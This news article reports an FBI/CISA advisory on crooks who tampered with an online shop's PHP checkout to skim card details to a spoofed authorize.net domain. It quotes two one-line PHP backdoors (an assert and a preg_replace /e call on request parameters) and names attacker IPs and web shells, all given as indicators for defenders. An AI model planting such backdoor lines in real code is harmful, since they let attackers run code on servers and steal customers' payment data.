How these crooks backdoor online shops and siphon victims' credit card info

FBI and co blow lid off latest PHP tampering scam

The FBI and its friends have warned businesses of crooks scraping people's credit-card details from tampered payment pages on compromised websites.

It's an age-old problem: someone breaks into your online store and alters the code so that as your customers enter their info, copies of their data is siphoned to fraudsters to exploit. The Feds this week have detailed one such effort that reared its head lately.

As early as September 2020, we're told, miscreants compromised at least one American company's vulnerable website from three IP addresses: 80[.]249.207.19, 80[.]82.64.211 and 80[.]249.206.197. The intruders modified the web script TempOrders.php in an attempt to inject malicious code into the checkout.php page.

In an advisory [PDF] from the FBI, and Uncle Sam's CISA and Homeland Security, from January 2022, code was injected into the checkout page to scrape customers' payment details and send it all to a server the crooks controlled that masqueraded as a legitimate card processing system.

As the FBI explained:

The malicious code posts the customer's payment information to a spoofed card processing domain, http://authorizen[.]net/, where the 'n' is added to impersonate or spoof http://authorize[.]net/, a legitimate card processing company's domain.

What's more, the crooks modified files on the infiltrated website's server to install two backdoors. One of these backdoors was a standard web shell – a page that executes commands on the remote system – which was deployed by including the statement assert($_REQUEST['login']) in a PHP page. This statement was exploited by visiting the tampered page with the login URL parameter set to code that fetched and installed the web shell.

The miscreants also slipped in code – @preg_replace("/f/e",$_GET['u'],"fengjiao") – that appears to process a regular expression, and can be exploited to execute code supplied in a URL parameter. Both of these code modifications were used to sneak the PHP web shells P.A.S. and b374 onto the victim's server for further nefarious purposes.

You may want to check the above strings aren't present into your site's PHP source code, and that you haven't a record of the IP addresses in your logs. The FBI also recommends several measures to make your systems less of an easy target for criminals. 

These include regular patching and software updates, changing default login credentials, segmenting network systems to prevent lateral movement, monitoring traffic in your e-commerce environment to identify potential malicious activity, and actively scanning web logs and apps for unauthorized access and abnormal behavior. 

Of course, criminals aren't the only ones with a penchant for scraping data. 

Tracking, marketing, and analytics firms have been exfiltrating the email addresses — and occasionally passwords — of internet users from web forms prior to submission and without user consent, according to researchers.

In a paper scheduled to appear at the Usenix '22 security conference later this year, authors Asuman Senol (imec-COSIC, KU Leuven), Gunes Acar (Radboud University), Mathias Humbert (University of Lausanne) and Frederik Zuiderveen Borgesius, (Radboud University) described how they measured data handling in web forms on the top 100,000 websites, as ranked by research site Tranco. ®

Similar topics


Other stories you might like

Biting the hand that feeds IT © 1998–2022